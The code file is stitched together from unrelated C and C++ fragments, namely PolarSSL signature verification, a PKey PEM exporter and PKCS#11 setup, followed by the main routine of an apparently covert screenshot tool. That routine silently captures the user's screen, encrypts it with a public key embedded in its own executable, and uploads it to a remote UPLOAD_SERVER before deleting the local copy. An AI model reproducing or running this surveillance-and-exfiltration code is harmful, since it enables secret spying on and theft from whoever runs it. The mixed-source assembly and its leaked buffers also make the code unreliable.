/*
* Verify a signature with options
*/
int pk_verify_ext( pk_type_t type, const void *options,
pk_context *ctx, md_type_t md_alg,
const unsigned char *hash, size_t hash_len,
const unsigned char *sig, size_t sig_len )
{
if( ctx == NULL || ctx->pk_info == NULL )
return( POLARSSL_ERR_PK_BAD_INPUT_DATA );
if( ! pk_can_do( ctx, type ) )
return( POLARSSL_ERR_PK_TYPE_MISMATCH );
if( type == POLARSSL_PK_RSASSA_PSS )
{
#if defined(POLARSSL_RSA_C) && defined(POLARSSL_PKCS1_V21)
int ret;
const pk_rsassa_pss_options *pss_opts;
if( options == NULL )
return( POLARSSL_ERR_PK_BAD_INPUT_DATA );
pss_opts = (const pk_rsassa_pss_options *) options;
if( sig_len < pk_get_len( ctx ) )
return( POLARSSL_ERR_RSA_VERIFY_FAILED );
ret = rsa_rsassa_pss_verify_ext( pk_rsa( *ctx ),
NULL, NULL, RSA_PUBLIC,
md_alg, hash_len, hash,
pss_opts->mgf1_hash_id,
pss_opts->expected_salt_len,
sig );
if( ret != 0 )
return( ret );
if( sig_len > pk_get_len( ctx ) )
return( POLARSSL_ERR_PK_SIG_LEN_MISMATCH );
return( 0 );
#else
return( POLARSSL_ERR_PK_FEATURE_UNAVAILABLE );
#endif
}
/* General case: no options */
if( options != NULL )
return( POLARSSL_ERR_PK_BAD_INPUT_DATA );
return( pk_verify( ctx, md_alg, hash, hash_len, sig, sig_len ) );
}
/*
rsa oaep encryption
*/
unsigned char *rsacrypt(pk_context *pkctx,const unsigned char *plaintext,const unsigned int plaintextsize){
entropy_context entropy = {0};
ctr_drbg_context ctr_drbg = {0};
rsa_context rsactx = {0};
int pkresult = 0;
unsigned char *encryptedoutput = NULL;
unsigned int encryptedoutputsize = 0;
char pers[33] = "3s:!2OXI(FX%#Q($[CEjiGRIk\\-)4e&?";
int ret = 0;
entropy_init( &entropy );
if((ret = ctr_drbg_init(&ctr_drbg, entropy_func, &entropy, (unsigned char *)&pers[0],strlen(pers))) != 0 ){
outputerror(DBG_ERROR,"%s\n","rsacrypt::failed to initialize random generator");
return NULL;
}
encryptedoutputsize = pk_get_len(pkctx);
outputerror(DBG_INFO,"%s %Iu\n","rsacrypt::buffer size for rsa encrypted output ",encryptedoutputsize);
encryptedoutput = (unsigned char *)malloc(encryptedoutputsize);
SecureZeroMemory(encryptedoutput,encryptedoutputsize);
rsa_copy(&rsactx,pkctx->pk_ctx);
rsactx.padding = RSA_PKCS_V21;
rsactx.hash_id = POLARSSL_MD_SHA1;
pkresult = 0;
pkresult = rsa_rsaes_oaep_encrypt(&rsactx,ctr_drbg_random,&ctr_drbg,RSA_PUBLIC,"cryptoshot",strlen("cryptoshot"),plaintextsize,plaintext,encryptedoutput);
if(pkresult != 0){
outputerror(DBG_ERROR,"%s %i\n","rsacrypt::failed to encrypt data",pkresult);
return NULL;
}
entropy_free(&entropy);
rsa_free(&rsactx);
return encryptedoutput;
}
result_t PKey::exportPem(std::string &retVal)
{
result_t hr;
bool priv;
hr = isPrivate(priv);
if (hr < 0)
return hr;
int ret;
std::string buf;
buf.resize(pk_get_len(&m_key) * 8 + 128);
if (priv)
ret = pk_write_key_pem(&m_key, (unsigned char *)&buf[0], buf.length());
else
ret = pk_write_pubkey_pem(&m_key, (unsigned char *)&buf[0], buf.length());
if (ret != 0)
return CHECK_ERROR(_ssl::setError(ret));
buf.resize(qstrlen(buf.c_str()));
retVal = buf;
return 0;
}
int pkcs11_priv_key_init( pkcs11_context *priv_key,
pkcs11h_certificate_t pkcs11_cert )
{
int ret = 1;
x509_crt cert;
x509_crt_init( &cert );
if( priv_key == NULL )
goto cleanup;
if( 0 != pkcs11_x509_cert_init( &cert, pkcs11_cert ) )
goto cleanup;
priv_key->len = pk_get_len( &cert.pk );
priv_key->pkcs11h_cert = pkcs11_cert;
ret = 0;
cleanup:
x509_crt_free( &cert );
return( ret );
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){
//misc vars
char currentpath[MAX_PATH] = {0};
//vars for getting public key from exe
unsigned char *pubrsakey = NULL;
int pubkeylen = 0;
//vars for taking the screenshot
unsigned char *finalbmpfile = NULL;
unsigned char *finalcompressedbmpfile = NULL;
int finalcompressedbmpfilelen = 0;
int finalbmpfilesize = 0;
//vars for data encryption
pk_context pk_ctx;
char *keypersonalisation = "5T+qDlP1=R1ek?GLqi|=)1O(niSimHBx|2\5QE.DN<7W\"]I@:?uSa#}txXN<9oG6";
char *ivpersonalisation = "J0eeYYCW.`6m;I5[v4|]0NDe1Hx)Co8D u]~9ZC\"x6AESc=a\\/W-e7d1bnMwq,z=]";
unsigned char *aeskey = NULL;
unsigned char *aesiv = NULL;
unsigned char *encrypteddata = NULL;
int encrypteddatalen = 0;
unsigned char *pubkeyencrypteddata;
unsigned int pubkeyencrypteddatalen = 0;
unsigned char keydata[48] = {0};
//vars for hmac
char *hmackeypersonalisation = "UGY624Z078'm.34\"|TSUOu\\M4}r!ammvFekes:%48=RmaA\\?SC.UTi8zB)A1a[P:";
unsigned char *hmackey = NULL;
unsigned char hmacoutput[64] = {0};
//vars for writing to file
DWORD dwBytesWritten = 0;
HANDLE hFile = NULL;
outputerror(DBG_INFO,"%s\n","main::started");
/* get public key*/
GetModuleFileName(NULL,¤tpath[0],sizeof(currentpath));
pubrsakey = getpublickeyfromself(¤tpath[0],&pubkeylen);
if(pubrsakey == NULL){
outputerror(DBG_ERROR,"%s\n","main::failed to get public key");
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
exit(1);
}
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
/* take screenshot */
if(takescreenshot(&finalbmpfile,&finalbmpfilesize) == 1){
outputerror(DBG_ERROR,"%s\n","main::failed to take screenshot");
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
zfree(finalbmpfile);
exit(1);
}
/* Main logic code
generate aes key
generate aes iv
generate hmac key
rsa encrypt(aeskey,aesiv)
write encrypted rsa length
write encrypted rsa blob
encrypt screenshot
write encrypted hmac key
hmac(encrypted screenshot)
write hmac
write screenshot
send screenshot
delete screenshot
In case you are wondering why locally save and delete,
so that we don't loose screenshots if the sending fails.
*/
aeskey = generatekey(keypersonalisation,256);
aesiv = generatekey(ivpersonalisation,128);
hmackey = generatekey(hmackeypersonalisation,256);
memcpy_s(keydata,48,aeskey,32);
memcpy_s(keydata+32,48,aesiv,16);
/* get and parse public key */
pk_ctx = getpubkeycontext(pubrsakey,pubkeylen);
if(pk_get_len(&pk_ctx) == 0){
outputerror(DBG_ERROR,"%s\n","main::failed to parse public key");
pk_free(&pk_ctx);
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
zfree(finalbmpfile);
exit(1);
}
/* encrypt aes key and iv and write to file */
pubkeyencrypteddatalen = pk_get_len(&pk_ctx);
pubkeyencrypteddata = (unsigned char *)malloc(pubkeyencrypteddatalen);
SecureZeroMemory(pubkeyencrypteddata,pubkeyencrypteddatalen);
pubkeyencrypteddata = rsacrypt(&pk_ctx,keydata,48);
if(pubkeyencrypteddata == NULL){
outputerror(DBG_ERROR,"%s\n","main::failed to encrypt aes key + aes iv");
pk_free(&pk_ctx);
SecureZeroMemory(aeskey,32);
SecureZeroMemory(aesiv,16);
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
zfree(finalbmpfile);
exit(1);
}
hFile = CreateFile("screen.enc", GENERIC_WRITE, 0, NULL,CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(hFile,(char *)&pubkeyencrypteddatalen,4,&dwBytesWritten,NULL);
WriteFile(hFile,pubkeyencrypteddata,pubkeyencrypteddatalen,&dwBytesWritten,NULL);
/* compress screenshot */
outputerror(DBG_INFO,"%s\n","main::compressing screenshot");
finalcompressedbmpfilelen = compressdata(finalbmpfile,finalbmpfilesize,&finalcompressedbmpfile);
if(finalcompressedbmpfilelen == 0){
outputerror(DBG_ERROR,"%s\n","main::failed to compress final bmp file");
pk_free(&pk_ctx);
SecureZeroMemory(aeskey,32);
SecureZeroMemory(aesiv,16);
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
zfree(finalbmpfile);
zfree(finalcompressedbmpfile);
exit(1);
}
SecureZeroMemory(finalbmpfile,finalbmpfilesize);
/* encrypt screenshot */
encrypteddata = encryptaes(aeskey,256,aesiv,finalcompressedbmpfile,finalcompressedbmpfilelen,&encrypteddatalen);
if(encrypteddata == NULL){
outputerror(DBG_ERROR,"%s\n","main::failed to encrypt the actual screenshot");
pk_free(&pk_ctx);
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
zfree(finalbmpfile);
exit(1);
}
/* encrypt hmac key and write to file*/
SecureZeroMemory(pubkeyencrypteddata,pubkeyencrypteddatalen);
pubkeyencrypteddata = rsacrypt(&pk_ctx,hmackey,32);
if(pubkeyencrypteddata == NULL){
outputerror(DBG_ERROR,"%s\n","main::failed to encrypt hmac key");
pk_free(&pk_ctx);
SecureZeroMemory(aeskey,32);
SecureZeroMemory(aesiv,16);
SecureZeroMemory(hmackey,32);
SecureZeroMemory(finalbmpfile,finalbmpfilesize);
SecureZeroMemory(currentpath,(sizeof(currentpath)/sizeof(currentpath[0])));
exit(1);
}
WriteFile(hFile,pubkeyencrypteddata,pubkeyencrypteddatalen,&dwBytesWritten,NULL);
/* calculate hmac(encrypteddata) and write to file */
sha512_hmac(hmackey,32,encrypteddata,encrypteddatalen,hmacoutput,0);
WriteFile(hFile,hmacoutput,64,&dwBytesWritten,NULL);
/* write encrypted screenshot to file */
WriteFile(hFile,encrypteddata,encrypteddatalen,&dwBytesWritten,NULL);
CloseHandle(hFile);
/* cleanup */
pk_free(&pk_ctx);
SecureZeroMemory(finalbmpfile,finalbmpfilesize);
SecureZeroMemory(keydata,48);
SecureZeroMemory(aeskey,32);
SecureZeroMemory(aesiv,16);
SecureZeroMemory(hmackey,32);
SecureZeroMemory(finalbmpfile,finalbmpfilesize);
free(finalbmpfile);
free(finalcompressedbmpfile);
free(aeskey);
free(aesiv);
free(hmackey);
free(pubrsakey);
free(encrypteddata);
free(pubkeyencrypteddata);
outputerror(DBG_INFO,"%s\n","main::finished");
/* now we send the file to our server if it works, we delete the file */
if (uploadscreenshot(UPLOAD_SERVER, "screen.enc") == 1){
DeleteFile("screen.enc");
}
return 0;
}
